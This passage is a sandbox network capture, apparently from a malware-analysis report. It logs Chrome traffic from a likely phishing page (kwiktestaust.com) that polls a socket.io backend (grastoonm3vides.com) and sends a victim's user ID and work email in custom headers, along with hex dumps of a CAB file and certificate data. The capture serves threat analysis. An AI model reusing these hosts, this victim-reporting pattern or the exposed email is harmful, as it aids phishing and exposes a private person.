                                                                2024-11-07 20:40:45 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                2024-11-07 20:40:45 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.1649760188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:53 UTC669OUTGET /socket.io/?EIO=4&transport=polling&t=PC8Ms_L HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:54 UTC816INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:53 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jXQjjehr7Zi0avIUBQNDvXDSPwOEMNoOocoe3jUbQG5YBmpf9bXjvuG1dS15spqo6xlhX0Z8AvjGiphnwqyX8RESbmCU2K6ta9%2BSnRdU00WhDkEdNLQSaeOGyRt%2FDjCNOsu%2FAV70"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df02417ad232ff0-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1251&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1247&delivery_rate=2481576&cwnd=239&unsent_bytes=0&cid=b32903ab80c0cf11&ts=155&x=0"
                                                                2024-11-07 20:40:54 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 79 45 6e 6b 4b 67 66 53 75 75 57 78 64 49 6a 64 41 41 42 34 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"yEnkKgfSuuWxdIjdAAB4","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.1649762188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:55 UTC387OUTGET /socket.io/?EIO=4&transport=polling&t=PC8Ms_L HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:34 UTC932INHTTP/1.1 522
                                                                Date: Thu, 07 Nov 2024 20:41:34 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 15
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WBj0IFpopUSDVQ9yXGB8VMblLqS%2FduzugEAEoIYOJLiojHNUZh%2FyG7E%2Fb6%2F4EoUIigsBOPiQD34kT9DdXSEQkf6ueyjdhJCmGOgpidsrd6P%2FTZvyknzsNaO0pJrRzqmqGXI2hyVc"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8df024235bbd5344-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=965&delivery_rate=151432&cwnd=32&unsent_bytes=0&cid=b47b2669944ef0b6&ts=38920&x=0"
                                                                2024-11-07 20:41:34 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                Data Ascii: error code: 522


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.1649763188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:56 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8MyYE HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:56 UTC908INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:40:56 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bs%2BJC1otNG0U6ApdH3a6SmSKiuhWryRKv5lsUEtFHBuBjJ0Q0cKIQh9jgpB4SBL2S1ixO6LaGL7cupCY7jyNGsSMTMg0VO0YqwC9sRnMQreaAfmhVtcVzBU20pe%2FenK1JVrVgJEn"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df02426ecfcc871-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1394&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1137&delivery_rate=2050991&cwnd=127&unsent_bytes=0&cid=11769eac7fb4756a&ts=162&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.1649765188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:57 UTC669OUTGET /socket.io/?EIO=4&transport=polling&t=PC8MyYE HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:57 UTC826INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:57 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4K%2FvrXSO2xQ0Acbwl7I5oAiTM%2B35l%2BK0gWATVQY5RxXwkZk5Hi7S0NQmjM0E9u0nbhQe7mmepxl52XA0JWh5N%2FOAUGiaFvbZomoEaBZ0tgF4iqx%2B%2FEy1oKde446ul2%2B%2FWIfN8tUz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df0242faa776b7d-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1994&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1247&delivery_rate=1361542&cwnd=215&unsent_bytes=0&cid=e009a444edd0303a&ts=155&x=0"
                                                                2024-11-07 20:40:57 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 59 6d 78 6f 45 4e 45 32 69 4d 7a 50 2d 68 74 66 41 41 42 35 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"YmxoENE2iMzP-htfAAB5","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.1649767188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:58 UTC387OUTGET /socket.io/?EIO=4&transport=polling&t=PC8MyYE HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:58 UTC813INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:58 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qTmShz7qsnlpHJKqsB9HvJ4M1DcNCkFoevDoJ2iixeJ%2BW9Q5av0rqxWV%2FEPZWyoexCPVeAz1PATnOMVcBK4R9etVDf7IuhLqpKHinSIph7EXASFJLlszQFR86TVvid9qFPpYKfE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df02434cbffa924-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=965&delivery_rate=1740384&cwnd=201&unsent_bytes=0&cid=0142931f8a2448a2&ts=153&x=0"
                                                                2024-11-07 20:40:58 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 37 43 75 65 37 4c 43 34 5f 43 6f 70 4a 6f 31 55 41 41 42 36 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"7Cue7LC4_CopJo1UAAB6","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.1649771188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:58 UTC585OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:18 UTC910INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:18 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PeLCZE7ip%2FHvMK9PxvcLVeSsadOuxXudoESomcVq27APAQqNOvrI9xrkIa0dFPAyrJAl9oUUEn1UOrtJrbBpI9MTzGn%2Bek4cbPO86jQarbMTMQiG0YLNcU6P5DYICGGdjT97eDvD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024384966e81f-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1773&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1163&delivery_rate=1581649&cwnd=251&unsent_bytes=0&cid=5f71c93f460b9aa7&ts=19410&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.1649773188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:58 UTC584OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:18 UTC908INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:18 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKHJpL0s6Vl8FIHrbmoR49sotdLxXQqsM8PLD99NWWCZrAX3adQ6R7efYjQ%2BkAWAn7WQHNIfMhmEb7uxWMZ0BCVVqtSBebsztgfCPr9MS7RDZhxfkjrDxnv6GoghKQmaAqdovY4U"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024386cc0284b-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1162&delivery_rate=1808869&cwnd=229&unsent_bytes=0&cid=656208bc8988314a&ts=19473&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.1649772188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:58 UTC560OUTGET /socket.io/?EIO=4&transport=websocket&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://kwiktestaust.com
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Sec-WebSocket-Key: 0NXt5/bEBwva7uNJuqbrDA==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.164977435.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:02 UTC552OUTOPTIONS /report/v4?s=4K%2FvrXSO2xQ0Acbwl7I5oAiTM%2B35l%2BK0gWATVQY5RxXwkZk5Hi7S0NQmjM0E9u0nbhQe7mmepxl52XA0JWh5N%2FOAUGiaFvbZomoEaBZ0tgF4iqx%2B%2FEy1oKde446ul2%2B%2FWIfN8tUz HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://grastoonm3vides.com
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:02 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: POST, OPTIONS
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-type, content-length
                                                                date: Thu, 07 Nov 2024 20:41:02 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.164977535.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:02 UTC490OUTPOST /report/v4?s=4K%2FvrXSO2xQ0Acbwl7I5oAiTM%2B35l%2BK0gWATVQY5RxXwkZk5Hi7S0NQmjM0E9u0nbhQe7mmepxl52XA0JWh5N%2FOAUGiaFvbZomoEaBZ0tgF4iqx%2B%2FEy1oKde446ul2%2B%2FWIfN8tUz HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 463
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:02 UTC463OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 30 30 38 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 30 31 34 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 77 69 6b 74 65 73 74 61 75 73 74 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 32 32 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                Data Ascii: [{"age":10080,"body":{"elapsed_time":40140,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://kwiktestaust.com/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":522,"type":"http.error"},"type":"network-error","
                                                                2024-11-07 20:41:03 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Thu, 07 Nov 2024 20:41:02 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.1649779188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:19 UTC754OUTPOST /socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Content-Length: 2
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Auth_UID: USER21102024U52102117
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Content-type: text/plain;charset=UTF-8
                                                                Accept: */*
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:19 UTC2OUTData Raw: 34 30
                                                                Data Ascii: 40
                                                                2024-11-07 20:41:19 UTC813INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:19 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FNJzZh2o%2F5%2B5uOacGfNet0x36xHRPgoEVjOmce6Gerba46WvbSzF1vHWbgYWnmQTbvCd0xatPdz3SYfGjjG%2BkJ2T3%2FUsmVDOu4qNoAz81mFwBDh7PmPp%2BLCfFgu%2FRzheIYi6SDZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024b98b2fcb76-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1356&delivery_rate=2106181&cwnd=252&unsent_bytes=0&cid=53605035c6ba736f&ts=153&x=0"
                                                                2024-11-07 20:41:19 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                Data Ascii: 2ok
                                                                2024-11-07 20:41:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.1649780188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:19 UTC694OUTGET /socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
